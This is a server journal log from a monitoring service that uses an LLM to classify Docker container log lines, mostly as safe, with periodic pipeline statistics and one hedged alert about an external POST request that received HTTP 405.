Mar 19 22:36:33 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:36:33.700540 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix
Mar 19 22:36:33 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:36:33.700578 [analyzer] Source hint mismatch: LLM says "docker app (HTTP access log)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:36:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:36:36.100547 [analyzer] LLM verdict for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: classification=suspicious confidence=0.62 action=alert pattern_type=
Mar 19 22:36:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:36:36.100580 [SUSPICIOUS] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=Web request returns HTTP 405 (method not allowed) to an unexpected endpoint (POST /) from an external client; could be probing or misconfigured client, not definitively malicious. Line=2026-03-19T22:36:34.110955292Z 35.222.125.2 - - [19/Mar/2026:22:36:34 +0000] "test3.admin.kovicloud.com" "POST / HTTP/1.1" 405 552 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KH...
Mar 19 22:36:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:36:36.162193 [observer] Pipeline: processed=601 pattern_hits=323 llm_calls=277 llm_errors=5 learned=1
Mar 19 22:36:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:36:36.162224 [observer] Patterns: hash=323 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=278
Mar 19 22:36:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:36:36.690894 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix
Mar 19 22:36:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:36:36.690928 [analyzer] Source hint mismatch: LLM says "docker container web/app access logs", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:36:39 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:36:39.948767 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix
Mar 19 22:36:39 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:36:39.948890 [analyzer] Source hint mismatch: LLM says "docker (captain-captain container) running an HTTP API", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:36:42 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:36:42.629051 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.86 action=allow pattern_type=prefix
Mar 19 22:36:42 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:36:42.629088 [analyzer] Source hint mismatch: LLM says "docker container web/app access log", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:36:45 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:36:45.940552 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.82 action=allow pattern_type=prefix
Mar 19 22:36:45 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:36:45.940613 [analyzer] Source hint mismatch: LLM says "docker container web access log (app)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:36:48 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:36:48.746771 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.70 action=allow pattern_type=prefix
Mar 19 22:36:48 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:36:48.746802 [analyzer] Source hint mismatch: LLM says "docker container (web/app access log)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:36:51 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:36:51.849044 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix
Mar 19 22:36:51 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:36:51.849084 [analyzer] Source hint mismatch: LLM says "dockerized web API (app logs endpoint)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:36:57 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:36:57.845836 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix
Mar 19 22:36:57 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:36:57.845870 [analyzer] Source hint mismatch: LLM says "docker/captain web app access log", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:37:00 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:37:00.767337 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix
Mar 19 22:37:00 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:37:00.767370 [analyzer] Source hint mismatch: LLM says "docker/http-access (captain-captain container)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:37:04 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:37:04.017790 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix
Mar 19 22:37:04 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:37:04.017827 [analyzer] Source hint mismatch: LLM says "docker/captain service (app HTTP access log)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:37:06 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:37:06.161562 [observer] Pipeline: processed=623 pattern_hits=336 llm_calls=286 llm_errors=5 learned=1
Mar 19 22:37:06 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:37:06.161590 [observer] Patterns: hash=336 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=287
Mar 19 22:37:06 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:37:06.882464 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix
Mar 19 22:37:06 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:37:06.882500 [analyzer] Source hint mismatch: LLM says "dockerized web/API service (captain)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:37:09 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:37:09.646789 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.74 action=allow pattern_type=prefix
Mar 19 22:37:09 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:37:09.646822 [analyzer] Source hint mismatch: LLM says "docker/captain containerized web service (API)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:37:12 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:37:12.954643 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix
Mar 19 22:37:12 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:37:12.954678 [analyzer] Source hint mismatch: LLM says "docker (captain-captain container) running a web/API service", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:37:15 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:37:15.901982 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix
Mar 19 22:37:15 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:37:15.902018 [analyzer] Source hint mismatch: LLM says "docker container HTTP access log", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:37:19 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:37:19.010374 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.74 action=allow pattern_type=prefix
Mar 19 22:37:19 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:37:19.010409 [analyzer] Source hint mismatch: LLM says "docker container web/app access logs", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:37:21 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:37:21.699807 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.70 action=allow pattern_type=prefix
Mar 19 22:37:21 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:37:21.699842 [analyzer] Source hint mismatch: LLM says "docker container web/app (captain-captain)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:37:24 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:37:24.823472 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=contains
Mar 19 22:37:24 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:37:24.823509 [analyzer] Source hint mismatch: LLM says "docker container web access log (app/api)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:37:25 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:37:25.964109 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix
Mar 19 22:37:25 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:37:25.964152 [analyzer] Source hint mismatch: LLM says "docker/captain web app access logs", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:37:27 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:37:27.671720 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=noise confidence=0.60 action=suppress pattern_type=prefix
Mar 19 22:37:27 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:37:27.671764 [analyzer] Source hint mismatch: LLM says "docker container access log (web/API service)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:37:30 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:37:30.731202 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix
Mar 19 22:37:30 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:37:30.731234 [analyzer] Source hint mismatch: LLM says "docker container web/app (captain-captain)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:37:33 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:37:33.627608 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.74 action=allow pattern_type=prefix
Mar 19 22:37:33 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:37:33.627638 [analyzer] Source hint mismatch: LLM says "docker (captain-captain container) / web application access logs", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:37:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:37:36.162733 [observer] Pipeline: processed=648 pattern_hits=350 llm_calls=297 llm_errors=5 learned=1
Mar 19 22:37:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:37:36.162758 [observer] Patterns: hash=350 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=298
Mar 19 22:37:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:37:36.743930 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix
Mar 19 22:37:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:37:36.743968 [analyzer] Source hint mismatch: LLM says "docker container (web API access log)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:37:39 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:37:39.794131 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=noise confidence=0.62 action=suppress pattern_type=prefix
Mar 19 22:37:39 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:37:39.794188 [analyzer] Source hint mismatch: LLM says "docker container HTTP access log", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:37:42 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:37:42.976916 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix
Mar 19 22:37:42 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:37:42.976953 [analyzer] Source hint mismatch: LLM says "docker container access logs (API reverse proxy/app)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:37:45 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:37:45.834363 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix
Mar 19 22:37:45 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:37:45.834396 [analyzer] Source hint mismatch: LLM says "docker container access log (application/API)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:37:48 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:37:48.925130 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=noise confidence=0.78 action=suppress pattern_type=prefix
Mar 19 22:37:48 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:37:48.925184 [analyzer] Source hint mismatch: LLM says "docker container web access log (app HTTP)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:37:51 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:37:51.696534 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=noise confidence=0.70 action=suppress pattern_type=prefix
Mar 19 22:37:51 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:37:51.696569 [analyzer] Source hint mismatch: LLM says "docker container access logger (HTTP reverse proxy/app)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:37:55 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:37:55.100919 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.74 action=allow pattern_type=prefix
Mar 19 22:37:55 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:37:55.100962 [analyzer] Source hint mismatch: LLM says "docker (captain-captain container access log)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:37:57 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:37:57.681816 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix
Mar 19 22:37:57 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:37:57.681853 [analyzer] Source hint mismatch: LLM says "docker container access log / application HTTP server", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:38:00 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:38:00.563192 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.82 action=allow pattern_type=contains
Mar 19 22:38:00 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:38:00.563233 [analyzer] Source hint mismatch: LLM says "docker container web/app access logging", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:38:03 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:38:03.694716 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix
Mar 19 22:38:03 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:38:03.694755 [analyzer] Source hint mismatch: LLM says "docker container web/app (captain-captain)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:38:06 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:38:06.161724 [observer] Pipeline: processed=671 pattern_hits=363 llm_calls=307 llm_errors=5 learned=1
Mar 19 22:38:06 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:38:06.161744 [observer] Patterns: hash=363 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=308
Mar 19 22:38:06 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:38:06.775737 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix
Mar 19 22:38:06 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:38:06.775773 [analyzer] Source hint mismatch: LLM says "docker container web API access log", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:38:09 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:38:09.813575 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.74 action=allow pattern_type=prefix
Mar 19 22:38:09 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:38:09.813611 [analyzer] Source hint mismatch: LLM says "docker container access log / application HTTP logs", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:38:12 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:38:12.628638 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.86 action=allow pattern_type=prefix
Mar 19 22:38:12 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:38:12.628672 [analyzer] Source hint mismatch: LLM says "docker container access/logs (captain)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:38:15 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:38:15.694403 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix
Mar 19 22:38:15 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:38:15.694452 [analyzer] Source hint mismatch: LLM says "docker container access log / application HTTP service", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:38:18 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:38:18.753010 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix
Mar 19 22:38:18 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:38:18.753052 [analyzer] Source hint mismatch: LLM says "docker container web/API (captain)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:38:21 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:38:21.800503 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=noise confidence=0.72 action=suppress pattern_type=prefix
Mar 19 22:38:21 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:38:21.800538 [analyzer] Source hint mismatch: LLM says "docker http access logs", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:38:24 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:38:24.643683 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.74 action=allow pattern_type=prefix
Mar 19 22:38:24 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:38:24.643720 [analyzer] Source hint mismatch: LLM says "docker container (web/app behind docker)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:38:25 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:38:25.968966 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix
Mar 19 22:38:25 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:38:25.969007 [analyzer] Source hint mismatch: LLM says "docker/captain-captain (web API container)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:38:27 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:38:27.759402 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix
Mar 19 22:38:27 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:38:27.759440 [analyzer] Source hint mismatch: LLM says "docker container access logs / application HTTP server", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:38:30 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:38:30.751027 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix
Mar 19 22:38:30 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:38:30.751065 [analyzer] Source hint mismatch: LLM says "docker container (captain-captain) running an HTTP API", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:38:33 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:38:33.835310 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.74 action=allow pattern_type=prefix
Mar 19 22:38:33 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:38:33.835350 [analyzer] Source hint mismatch: LLM says "docker container (web/API HTTP access log)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:38:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:38:36.163637 [observer] Pipeline: processed=695 pattern_hits=376 llm_calls=318 llm_errors=5 learned=1
Mar 19 22:38:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:38:36.163663 [observer] Patterns: hash=376 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=319
Mar 19 22:38:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:38:36.789301 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix
Mar 19 22:38:36 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:38:36.789332 [analyzer] Source hint mismatch: LLM says "docker-captain (web/api container access log)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:38:40 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:38:40.001909 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.74 action=allow pattern_type=prefix
Mar 19 22:38:40 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:38:40.001947 [analyzer] Source hint mismatch: LLM says "docker container web/app access log", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:38:42 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:38:42.776035 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix
Mar 19 22:38:42 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:38:42.776069 [analyzer] Source hint mismatch: LLM says "docker (container access log / reverse proxy)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:38:45 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:38:45.588613 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.72 action=allow pattern_type=prefix
Mar 19 22:38:45 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:38:45.588651 [analyzer] Source hint mismatch: LLM says "docker container web/app access log (captain-captain)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:38:48 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:38:48.765337 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix
Mar 19 22:38:48 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:38:48.765377 [analyzer] Source hint mismatch: LLM says "dockerized web API (captain-captain container)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:38:51 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:38:51.985443 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix
Mar 19 22:38:51 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:38:51.985481 [analyzer] Source hint mismatch: LLM says "docker container web/app access log (captain)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:38:54 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:38:54.653778 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix
Mar 19 22:38:54 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:38:54.653814 [analyzer] Source hint mismatch: LLM says "docker container access log / web app", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:38:57 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:38:57.843252 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix
Mar 19 22:38:57 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:38:57.843288 [analyzer] Source hint mismatch: LLM says "docker-captain (web/app reverse proxy container)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:39:00 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:39:00.628996 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix
Mar 19 22:39:00 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:39:00.629033 [analyzer] Source hint mismatch: LLM says "docker/captain-captain (HTTP access log from app)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:39:03 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:39:03.735666 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix
Mar 19 22:39:03 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:39:03.735706 [analyzer] Source hint mismatch: LLM says "docker container access logs / application web server", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:39:06 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:39:06.162509 [observer] Pipeline: processed=719 pattern_hits=390 llm_calls=328 llm_errors=5 learned=1
Mar 19 22:39:06 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:39:06.162530 [observer] Patterns: hash=390 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=329
Mar 19 22:39:06 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:39:06.744221 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.62 action=allow pattern_type=prefix
Mar 19 22:39:06 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:39:06.744256 [analyzer] Source hint mismatch: LLM says "docker container web/API access log", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:39:09 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:39:09.689269 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.74 action=allow pattern_type=prefix
Mar 19 22:39:09 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:39:09.689307 [analyzer] Source hint mismatch: LLM says "docker container HTTP access log", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:39:12 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:39:12.778825 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.84 action=allow pattern_type=prefix
Mar 19 22:39:12 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:39:12.778862 [analyzer] Source hint mismatch: LLM says "docker/captain web access logs (app HTTP)", actual is "captain-captain.1.oqvny8g95v3neveijmxdmdgto" — skipping pattern
Mar 19 22:39:16 ip-172-26-12-110 observer[1561913]: 2026/03/19 22:39:16.022231 [analyzer] LLM verdict for docker:captain-captain.1.oqvny8g95v3neveijmxdmdgto: classification=safe confidence=0.78 action=allow pattern_type=prefix
